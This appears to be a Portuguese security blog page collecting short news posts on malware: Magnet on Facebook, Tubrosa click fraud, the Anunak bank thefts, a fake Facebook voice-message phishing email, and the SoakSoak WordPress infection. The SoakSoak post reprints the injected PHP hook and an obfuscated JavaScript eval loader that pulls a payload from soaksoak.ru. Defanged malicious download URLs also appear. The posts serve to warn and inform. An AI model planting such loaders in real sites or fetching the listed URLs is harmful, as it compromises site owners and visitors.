Todos os posts tagados malware

Magnet – um novo malware no Facebook

facebook

Um novo malware, descoberto por Mohammad Faghani e intitulado de Magnet, está a propagar-se pelo Facebook utilizando um suposto vídeo pornográfico e com mensagens apelativas. A ideia é que, os utilizadores desta rede social mais curiosos, cliquem no suposto vídeo.

Em apenas dois dias, este malware infetou mais de 100.000 utilizadores. Este número deverá aumentar nos próximos dias.

Ao clicar no link que acompanha o post de Facebook, assim que o utilizador começa a ver um vídeo, é reencaminhado para uma instalação de uma falsa atualização do Adobe Flash Player.
Já reparei que a imagem erótica que acompanha este conteúdo malicioso vai sendo modificada e por isso a minha recomendação é simplesmente não clicar nestes links.

Embora o Facebook tenha sistema automatizados para prevenir ligações maliciosos se propaguem pela rede, muitas conseguem ultrapassar este tipo de proteção e infetar milhares de utilizadores curiosos.

Instalei o malware num ambiente controlado e reparei que, após a instalação da suposta atualização do Flash [extensão para o browser], o Magnet partilha no Facebook o link malicioso e identifica 20 amigos na rede social. Também gosta de uma ligação duma página de Facebook e pelos vistos, já são bastantes os likes.

facebook_malware

O Magnet aparenta ter um um sistema keylogger [monitoriza rato e teclado] e aceita comandos C&C [command & control].

Faghani acrescenta que este malware atualiza-se automaticamente com novos padrões de ataque e bloqueia diversos tipos de proteção contra estas ameaças.

Uma nova variante deste malware, força a vítima também a seguir uma conta no Twitter.

Quem quiser acompanhar o desenvolvimento deste malware pode fazê-lo seguinte a sua assinatura MD5: https://malwr.com/analysis/ZDkyZWIwZGI4YjA2NGNiZjk4MDRlMmMzZmNjN2Y4YjA/.
Saliento que o pacote PT-pt está incluído neste malware, e como se pode ver no mapa, Portugal está entre os muito infetados com o Magnet.

fbmalheatmap

Relatório completo do Mohammad Faghani – http://www.faghani.info/report.txt

Malware usa vídeos do Youtube para financiar piratas

Tubrosa 1

A Symantec publicou um alerta sobre um novo malware intitulado de Tubrosa, que envia computadores infetados para determinados vídeos Youtube.
Objetivo? Os utilizadores maliciosos donos desses vídeos ganharem dinheiro com as visitas ao vídeo [Youtube Partner Program].

O processo é um muito simples:

  1. Os utilizadores maliciosos enviam link malicioso por email, ou rede social, à vítima
  2. A vítima é infetada e, sem este dê conta, começa a fazer abrir páginas de a vídeos específicos do Youtube
  3. Os utilizadores maliciosos começam a ganhar dinheiro com as visitas e com os anúncios inseridos nos mesmos

Click-fraud-malware-campaign-tubrosa

O Tubrosa tem sido propagado nos últimos meses, iniciou em agosto de 2014, e a Symantec acredita que já devem ter ganho milhares de dólares [poderá ser mais porque a Symantec acredita em mais campanhas do género] com o programa do Youtube.
O malware recebe uma lista de cerca de 1000 links Youtube de um servidor de comando e controlo [C&C] e abre em background nos sistemas das vítimas. O Tubrosa tem mesmo uma funcionalidade de baixar o volume enquanto os vídeos estão a correr e a capacidade de instalar o Adobe Flash caso a vítima não o tenha instalado.

Segundo a Symantec, o Youtube Partner Program usa um processo de validação de conta de utilizador. No entanto, o malware Tubrosa ultrapassou estas proteções criando um ficheiro dinâmico com vários referals e useragents utilizando dois scripts em PHP. Este processo fez com que o Google assumisse que sempre que havia um pedido ao vídeo, seria um novo visitante.

Os países mais afetados [ou seja, com mais vítimas] são a Coreia do Sul, Índia, Mexico e Estados Unidos.

Tubrosa-Click-fraud-malware

A Symantec em conjunto com o Google estão a desenvolver um proteção para evitar este tipo de situações.

Fica a dica: Estejam atentos aos links que vos enviam e não cliquem em tudo o que aparece no email ou redes sociais.

Grupo russo Anunak roubou 17 milhões de dólares desde 2013

anunak

Especialistas do Group-IB e Fox-IT publicaram hoje um relatório onde divulgam que um grupo de hackers russos intitulados de Anunak conseguiram roubar cerca de 17 milhões de dólares à indústria bancária e a grandes retalhistas ocidentais.

Segundo o relatório, este grupo não rouba diretamente o dinheiro aos consumidores mas aos bancos atacando os pagamentos online. Para além disso, se alguma rede governamental for comprometida, essa infraestrutura será usada para espionagem.

Este ano, as atividades desde grupo aumentaram consideravelmente e foi verificado um interesse bastante ativo em comprometer sistemas POS nos Estados Unidos e noutros grandes retalhistas europeus – objectivo? roubar informações de pagamento.

Tudo começa com um simples email enviado a um dos funcionários da empresa/governo alvo. Nesse email, segue em anexo um ficheiro malware que se aproveita de vulnerabilidades no Microsoft Word para infetar o computador do destinatário. Depois de obter acesso, os invasores tentam obter os dados de acesso às contas com acesso administrativos. Depois surge o efeito bola de neve, que vai percorrendo a rede até aceder a toda a infraestrutura e dando permissões de acesso remoto a qualquer altura.
Alegadamente até conseguem gravar vídeos das acções das vítimas para perceber como o trabalho é organizado e estruturado.

A Tripwire elaborou um pequeno vídeo a explicar como os grupos de hacking conseguem rentabilizar a informação de crédito roubado:

Podem ler o relatório completo dobre as atividades do grupo Anunak em PDF.

Já recebeu hoje esta mensagem do Facebook?

facebook_voz

Alegadas mensagens de voz vindas do Facebook estão a encher as caixas de email de muitos utilizadores portugueses.
O assunto destes emails é sempre o mesmo – MENSAGEM DE NATAL e têm todos o aspeto de uma mensagem do Facebook.

O texto que acompanha o corpo do email é o seguinte:

Você recebeu um comentário de Voz em sua foto
Gravação: Para ouvir o AUDIO comentário basta clicar em Ouvir Voz comentário.
O conteúdo gravado é de responsabilidade do usuário.

O link que acompanha este email é malicioso e está alojado em hxxp://facebook-audio.cloudapp.net/audio.php. Este script PHP reencaminha para um download:
hxxp://w479565.blob4.ge.tt/streams/7WvtE272/audiovoz.zip?sig=-UpYSXaFhlWa881FTPsCW0xL3jKcoBHH480&type=download

Deve eliminar esta mensagem e, caso tenha clicado no link, correr o seu antivirus imediatamente.

Mais de 100000 sites WordPress infetados

SoakSoak-RU-Blacklisted

O Google bloqueou ontem cerca de 11.000 domínios com a última campanha de malware SoakSoak.
A empresa Sucuri suspeita que os valores sejam bem superiores e que estão relacionados com a vulnerabilidade no plugin para WordPress Revslider.

O SoakSoak modifica o seguinte ficheiro do WordPress wp-includes/template-loader.php e inclui o seguinte código:

function FuncQueueObject()
{
  wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');

Isto faz com que o swobject.js seja executado em todas as páginas do blog que inclui o seguinte malware:

eval(decodeURIComponent
("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));

Este código JavaScript ofuscado, carrega o ficheiro malicioso hxxp://soaksoak.ru/xteas/code

Contatei algumas empresas de alojamento em Portugal, que mencionaram a presença deste malware em algumas das suas contas de clientes mas que a situação encontra-se controlada.